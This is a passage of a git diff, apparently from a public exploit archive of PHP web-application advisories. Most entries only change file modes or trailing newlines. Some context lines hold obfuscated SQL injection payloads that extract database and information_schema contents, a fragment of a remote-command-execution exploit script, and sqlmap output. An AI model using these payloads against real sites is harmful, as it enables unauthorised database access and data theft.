a/platforms/php/webapps/4186.txt b/platforms/php/webapps/4186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41860.txt b/platforms/php/webapps/41860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41862.txt b/platforms/php/webapps/41862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41864.txt b/platforms/php/webapps/41864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4187.txt b/platforms/php/webapps/4187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41876.txt b/platforms/php/webapps/41876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41885.txt b/platforms/php/webapps/41885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4189.txt b/platforms/php/webapps/4189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41890.txt b/platforms/php/webapps/41890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4191.txt b/platforms/php/webapps/4191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41918.txt b/platforms/php/webapps/41918.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41919.txt b/platforms/php/webapps/41919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4192.htm b/platforms/php/webapps/4192.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41920.txt b/platforms/php/webapps/41920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41921.txt b/platforms/php/webapps/41921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41922.txt b/platforms/php/webapps/41922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4193.txt b/platforms/php/webapps/4193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41930.txt b/platforms/php/webapps/41930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41936.txt b/platforms/php/webapps/41936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41939.txt b/platforms/php/webapps/41939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4194.txt b/platforms/php/webapps/4194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41944.txt b/platforms/php/webapps/41944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4195.txt b/platforms/php/webapps/4195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41953.md b/platforms/php/webapps/41953.md old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41966.txt b/platforms/php/webapps/41966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41967.txt b/platforms/php/webapps/41967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4197.txt b/platforms/php/webapps/4197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41979.txt b/platforms/php/webapps/41979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41988.txt b/platforms/php/webapps/41988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41989.txt b/platforms/php/webapps/41989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4199.txt b/platforms/php/webapps/4199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41990.html b/platforms/php/webapps/41990.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41997.txt b/platforms/php/webapps/41997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42003.txt b/platforms/php/webapps/42003.txt old mode 100755 new mode 100644 index 2215a8d0f..218e5bc90 --- a/platforms/php/webapps/42003.txt +++ b/platforms/php/webapps/42003.txt @@ -50,5 +50,4 @@ $filename will be visible on page: line 123 : $content .= _('Uploaded file') . ': ' . $filename . '<p />'; ----------------------------------------------------------------------- - \ No newline at end of file +---------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/42004.txt b/platforms/php/webapps/42004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42005.txt b/platforms/php/webapps/42005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4201.txt b/platforms/php/webapps/4201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42012.txt b/platforms/php/webapps/42012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42033.txt b/platforms/php/webapps/42033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42035.txt b/platforms/php/webapps/42035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42038.txt b/platforms/php/webapps/42038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42042.txt b/platforms/php/webapps/42042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42043.txt b/platforms/php/webapps/42043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42044.txt b/platforms/php/webapps/42044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4206.txt b/platforms/php/webapps/4206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42082.txt b/platforms/php/webapps/42082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4209.txt b/platforms/php/webapps/4209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42094.txt b/platforms/php/webapps/42094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42095.txt b/platforms/php/webapps/42095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42096.txt b/platforms/php/webapps/42096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42097.txt b/platforms/php/webapps/42097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42098.txt b/platforms/php/webapps/42098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4210.txt b/platforms/php/webapps/4210.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4211.htm b/platforms/php/webapps/4211.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42113.txt b/platforms/php/webapps/42113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4212.txt b/platforms/php/webapps/4212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42129.txt b/platforms/php/webapps/42129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4213.txt b/platforms/php/webapps/4213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42131.txt b/platforms/php/webapps/42131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42132.txt b/platforms/php/webapps/42132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42133.txt b/platforms/php/webapps/42133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42143.txt b/platforms/php/webapps/42143.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42151.txt b/platforms/php/webapps/42151.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42156.txt b/platforms/php/webapps/42156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42164.txt b/platforms/php/webapps/42164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42166.txt b/platforms/php/webapps/42166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42167.txt b/platforms/php/webapps/42167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42172.txt b/platforms/php/webapps/42172.txt old mode 100755 new mode 100644 index 67ca3d1bd..9d883c823 --- a/platforms/php/webapps/42172.txt +++ b/platforms/php/webapps/42172.txt @@ -44,6 +44,4 @@ latest version. http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/ -http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603 - - \ No newline at end of file +http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603 \ No newline at end of file diff --git a/platforms/php/webapps/42173.txt b/platforms/php/webapps/42173.txt old mode 100755 new mode 100644 index d17438529..195403a2c --- a/platforms/php/webapps/42173.txt +++ b/platforms/php/webapps/42173.txt @@ -44,8 +44,4 @@ for a hotfix. http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje ction-sqli/ -http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429 - - - - \ No newline at end of file +http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429 \ No newline at end of file diff --git a/platforms/php/webapps/42185.txt b/platforms/php/webapps/42185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4219.txt b/platforms/php/webapps/4219.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42193.txt b/platforms/php/webapps/42193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42205.html b/platforms/php/webapps/42205.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4221.txt b/platforms/php/webapps/4221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4224.txt b/platforms/php/webapps/4224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4225.txt b/platforms/php/webapps/4225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42262.txt b/platforms/php/webapps/42262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42263.txt b/platforms/php/webapps/42263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42291.txt b/platforms/php/webapps/42291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42317.txt b/platforms/php/webapps/42317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42330.txt b/platforms/php/webapps/42330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42347.txt b/platforms/php/webapps/42347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42348.txt b/platforms/php/webapps/42348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4235.txt b/platforms/php/webapps/4235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42351.txt b/platforms/php/webapps/42351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42353.txt b/platforms/php/webapps/42353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42359.txt b/platforms/php/webapps/42359.txt old mode 100755 new mode 100644 index d30518a26..4aea8f47e --- a/platforms/php/webapps/42359.txt +++ b/platforms/php/webapps/42359.txt @@ -61,4 +61,4 @@ CÔNG TY CÔNG NGHỆ BẢO TÍN Email này đã được quét bằng tính năng bảo vệ diệt vi-rút của BullGuard. -Để biết thêm thông tin, hãy truy cập www.bullguard.com <http://www.bullguard.com/tracking.aspx?affiliate=bullguard&buyaffiliate=smtp&url=/> \ No newline at end of file +Để biết thêm thông tin, hãy truy cập www.bullguard.com <http://www.bullguard.com/tracking.aspx?affiliate=bullguard&buyaffiliate=smtp&url=/> \ No newline at end of file diff --git a/platforms/php/webapps/42379.txt b/platforms/php/webapps/42379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4238.txt b/platforms/php/webapps/4238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42380.txt b/platforms/php/webapps/42380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42381.txt b/platforms/php/webapps/42381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42383.html b/platforms/php/webapps/42383.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42387.txt b/platforms/php/webapps/42387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42393.txt b/platforms/php/webapps/42393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42403.txt b/platforms/php/webapps/42403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42404.txt b/platforms/php/webapps/42404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4241.txt b/platforms/php/webapps/4241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42410.txt b/platforms/php/webapps/42410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42412.txt b/platforms/php/webapps/42412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42413.txt b/platforms/php/webapps/42413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42414.txt b/platforms/php/webapps/42414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42415.txt b/platforms/php/webapps/42415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42416.txt b/platforms/php/webapps/42416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42417.txt b/platforms/php/webapps/42417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42419.txt b/platforms/php/webapps/42419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4242.php b/platforms/php/webapps/4242.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42420.txt b/platforms/php/webapps/42420.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42421.txt b/platforms/php/webapps/42421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42423.txt b/platforms/php/webapps/42423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42431.txt b/platforms/php/webapps/42431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42440.txt b/platforms/php/webapps/42440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42441.txt b/platforms/php/webapps/42441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42442.txt b/platforms/php/webapps/42442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42443.txt b/platforms/php/webapps/42443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42446.txt b/platforms/php/webapps/42446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42447.txt b/platforms/php/webapps/42447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42448.txt b/platforms/php/webapps/42448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42457.txt b/platforms/php/webapps/42457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42458.txt b/platforms/php/webapps/42458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4246.txt b/platforms/php/webapps/4246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42461.txt b/platforms/php/webapps/42461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42462.txt b/platforms/php/webapps/42462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42463.txt b/platforms/php/webapps/42463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4248.txt b/platforms/php/webapps/4248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42482.txt b/platforms/php/webapps/42482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42487.txt b/platforms/php/webapps/42487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42488.txt b/platforms/php/webapps/42488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42489.txt b/platforms/php/webapps/42489.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42490.txt b/platforms/php/webapps/42490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42491.txt b/platforms/php/webapps/42491.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42492.txt b/platforms/php/webapps/42492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42493.txt b/platforms/php/webapps/42493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42494.txt b/platforms/php/webapps/42494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42496.txt b/platforms/php/webapps/42496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42497.txt b/platforms/php/webapps/42497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42499.txt b/platforms/php/webapps/42499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42500.txt b/platforms/php/webapps/42500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42501.txt b/platforms/php/webapps/42501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42502.txt b/platforms/php/webapps/42502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42504.txt b/platforms/php/webapps/42504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42505.txt b/platforms/php/webapps/42505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42506.txt b/platforms/php/webapps/42506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42507.txt b/platforms/php/webapps/42507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42508.txt b/platforms/php/webapps/42508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42509.txt b/platforms/php/webapps/42509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42510.txt b/platforms/php/webapps/42510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42511.txt b/platforms/php/webapps/42511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42513.txt b/platforms/php/webapps/42513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42514.txt b/platforms/php/webapps/42514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42515.txt b/platforms/php/webapps/42515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42516.txt b/platforms/php/webapps/42516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42520.txt b/platforms/php/webapps/42520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42524.txt b/platforms/php/webapps/42524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42525.txt b/platforms/php/webapps/42525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42526.txt b/platforms/php/webapps/42526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42527.txt b/platforms/php/webapps/42527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42528.txt b/platforms/php/webapps/42528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42529.txt b/platforms/php/webapps/42529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42530.txt b/platforms/php/webapps/42530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42531.txt b/platforms/php/webapps/42531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42532.txt b/platforms/php/webapps/42532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42533.txt b/platforms/php/webapps/42533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42534.txt b/platforms/php/webapps/42534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42535.txt b/platforms/php/webapps/42535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4254.txt b/platforms/php/webapps/4254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42545.txt b/platforms/php/webapps/42545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42552.txt b/platforms/php/webapps/42552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42553.txt b/platforms/php/webapps/42553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42561.txt b/platforms/php/webapps/42561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42562.txt b/platforms/php/webapps/42562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42563.txt b/platforms/php/webapps/42563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42564.txt b/platforms/php/webapps/42564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42566.txt b/platforms/php/webapps/42566.txt old mode 100755 new mode 100644 index 8896bbae4..49eb5fd97 --- a/platforms/php/webapps/42566.txt +++ b/platforms/php/webapps/42566.txt @@ -46,4 +46,4 @@ # or exploits by the author or elsewhere. # # -# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42569.txt b/platforms/php/webapps/42569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42570.txt b/platforms/php/webapps/42570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42571.txt b/platforms/php/webapps/42571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42572.txt b/platforms/php/webapps/42572.txt old mode 100755 new mode 100644 index ad3afd332..0be51394f --- a/platforms/php/webapps/42572.txt +++ b/platforms/php/webapps/42572.txt @@ -25,4 +25,4 @@ # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42573.txt b/platforms/php/webapps/42573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42574.txt b/platforms/php/webapps/42574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42575.txt b/platforms/php/webapps/42575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42577.txt b/platforms/php/webapps/42577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42578.txt b/platforms/php/webapps/42578.txt old mode 100755 new mode 100644 index 40f6e774c..8d2896fd7 --- a/platforms/php/webapps/42578.txt +++ b/platforms/php/webapps/42578.txt @@ -43,4 +43,4 @@ # or exploits by the author or elsewhere. # # -# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4258.txt b/platforms/php/webapps/4258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42582.txt b/platforms/php/webapps/42582.txt old mode 100755 new mode 100644 index bd91e1808..0f0ca3c1c --- a/platforms/php/webapps/42582.txt +++ b/platforms/php/webapps/42582.txt @@ -43,4 +43,4 @@ # or exploits by the author or elsewhere. # # -# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42583.txt b/platforms/php/webapps/42583.txt old mode 100755 new mode 100644 index 87e6ce0d7..7b8e11e42 --- a/platforms/php/webapps/42583.txt +++ b/platforms/php/webapps/42583.txt @@ -39,4 +39,4 @@ # or exploits by the author or elsewhere. # # -# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42584.txt b/platforms/php/webapps/42584.txt old mode 100755 new mode 100644 index e2d6e74af..e56d6e9ab --- a/platforms/php/webapps/42584.txt +++ b/platforms/php/webapps/42584.txt @@ -50,4 +50,4 @@ Description : attacker can craft a malicious page and send it to any user who is </html> -|-----------------------------------------EOF----------------------------------------- +|-----------------------------------------EOF----------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/42585.txt b/platforms/php/webapps/42585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42589.txt b/platforms/php/webapps/42589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42590.txt b/platforms/php/webapps/42590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42591.txt b/platforms/php/webapps/42591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42592.html b/platforms/php/webapps/42592.html old mode 100755 new mode 100644 index 5d26222e8..d84c544be --- a/platforms/php/webapps/42592.html +++ b/platforms/php/webapps/42592.html @@ -65,9 +65,4 @@ # or exploits by the author or elsewhere. # # -# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # - - - - - +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42595.txt b/platforms/php/webapps/42595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42596.txt b/platforms/php/webapps/42596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42597.txt b/platforms/php/webapps/42597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42598.txt b/platforms/php/webapps/42598.txt old mode 100755 new mode 100644 index 8bc8de868..5e10c9004 --- a/platforms/php/webapps/42598.txt +++ b/platforms/php/webapps/42598.txt @@ -31,6 +31,4 @@ • 500 (Internal Server Error) - 6637 times • [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • - • [*] shutting down at 16:48:10 - - + • [*] shutting down at 16:48:10 \ No newline at end of file diff --git a/platforms/php/webapps/42603.txt b/platforms/php/webapps/42603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42606.txt b/platforms/php/webapps/42606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42607.txt b/platforms/php/webapps/42607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42615.txt b/platforms/php/webapps/42615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42616.txt b/platforms/php/webapps/42616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42617.txt b/platforms/php/webapps/42617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42618.txt b/platforms/php/webapps/42618.txt old mode 100755 new mode 100644 index 113b88cce..3da3f1126 --- a/platforms/php/webapps/42618.txt +++ b/platforms/php/webapps/42618.txt @@ -69,4 +69,4 @@ Benjamin Lim - [https://limbenjamin.com] -- *Benjamin Lim* E: mail@limbenjamin.com -PGP : https://limbenjamin.com/pgp +PGP : https://limbenjamin.com/pgp \ No newline at end of file diff --git a/platforms/php/webapps/42619.txt b/platforms/php/webapps/42619.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42620.txt b/platforms/php/webapps/42620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42621.html b/platforms/php/webapps/42621.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42622.html b/platforms/php/webapps/42622.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42623.txt b/platforms/php/webapps/42623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42628.txt b/platforms/php/webapps/42628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42629.txt b/platforms/php/webapps/42629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42631.txt b/platforms/php/webapps/42631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42632.txt b/platforms/php/webapps/42632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42635.txt b/platforms/php/webapps/42635.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42636.txt b/platforms/php/webapps/42636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42637.txt b/platforms/php/webapps/42637.txt old mode 100755 new mode 100644 index ae943ae56..a5f102381 --- a/platforms/php/webapps/42637.txt +++ b/platforms/php/webapps/42637.txt @@ -24,4 +24,4 @@ # -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42638.py b/platforms/php/webapps/42638.py index e85e373ae..e23c29c55 100755 --- a/platforms/php/webapps/42638.py +++ b/platforms/php/webapps/42638.py @@ -68,4 +68,4 @@ def RCE(target, command): target = sys.argv[1] command = sys.argv[2] -print RCE(target,command) +print RCE(target,command) \ No newline at end of file diff --git a/platforms/php/webapps/42639.txt b/platforms/php/webapps/42639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42640.txt b/platforms/php/webapps/42640.txt old mode 100755 new mode 100644 index 963b61fcc..3ae13dcc0 --- a/platforms/php/webapps/42640.txt +++ b/platforms/php/webapps/42640.txt @@ -26,4 +26,4 @@ # http://localhost/[PATH]/info.php?page=[SQL] # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42641.txt b/platforms/php/webapps/42641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42642.txt b/platforms/php/webapps/42642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/42643.txt b/platforms/php/webapps/42643.txt old mode 100755 new mode 100644 index 25240118b..9e07d208f --- a/platforms/php/webapps/42643.txt +++ b/platforms/php/webapps/42643.txt @@ -22,4 +22,4 @@ # 